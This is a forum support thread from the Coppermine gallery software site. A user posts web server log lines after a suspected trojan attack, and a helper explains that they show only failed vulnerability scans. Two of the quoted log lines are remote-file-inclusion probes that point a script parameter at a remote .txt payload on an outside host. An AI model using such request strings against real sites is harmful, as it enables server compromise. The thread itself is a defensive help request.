Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: [Closed]: Trojan Attack  (Read 5005 times)

0 Members and 1 Guest are viewing this topic.

empfl

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 54
  • cy tha game
[Closed]: Trojan Attack
« on: April 10, 2008, 11:58:55 am »

Hello to all,

Our home page became the victim of an Trojan Attack.
A Friend has looked at the log file and he thinks that the
attack was executed via Coppermine.

I would like to ask for help therefore here.
Has another user these problem already, too?
How can I take remedial action?
 
Following a couple of lines from the log file

80.190.202.154 - - [25/Mar/2008:22:37:23 +0100] "GET /coppermine/e107_plugins/my_gallery/dload.php?file=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 619 www.xxxxxx-xxxxxxx.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
66.7.192.123 - - [26/Mar/2008:01:07:19 +0100] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 619 www.xxxxxx-xxxxxxx.de "-"
84.164.252.115 - - [07/Apr/2008:22:42:09 +0200] "GET /coppermine/scripts.js HTTP/1.1" 200 6578 www.xxxxxx-xxxxxxx.xx "http://www.xxxxxx-xxxxxxx.de/coppermine/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "-"
84.164.252.115 - - [07/Apr/2008:22:42:10 +0200] "GET /Gallery/Saved/avuzuf/check.js HTTP/1.1" 403 623 www.xxxxxx-xxxxxxx.de "http://www.xxxxxx-xxxxxxx.de/coppermine/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "-"
84.164.252.115

Tanks for attention
« Last Edit: April 11, 2008, 11:06:34 pm by Joachim Müller »
Logged

empfl

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 54
  • cy tha game
Re: Trojan Attack
« Reply #1 on: April 10, 2008, 07:24:36 pm »


Hello,

sorry, forgot to mention that we have installed the latest version: 1.4.16 (stable).
And we don't allow uploads from other users.

regards
Logged

Nibbler

  • Guest
Re: Trojan Attack
« Reply #2 on: April 10, 2008, 07:29:51 pm »

Current issue is: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

However those log extracts do not indicate an actual hack, just failed attempts/scanning for vulnerabilities. The first 2 are even 404 which means you don't have the files they are looking for.
Logged

empfl

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 54
  • cy tha game
Re: Trojan Attack
« Reply #3 on: April 11, 2008, 12:05:12 pm »

Many Thanks Nibbler,

but plz let me have a last question.

Are there any activities or efforts to close this security gap?

Thx
Logged

Nibbler

  • Guest
Re: Trojan Attack
« Reply #4 on: April 11, 2008, 12:08:46 pm »

Naturally. Read the thread I posted.
Logged
Pages: [1]   Go Up
 

Page created in 0.02 seconds with 20 queries.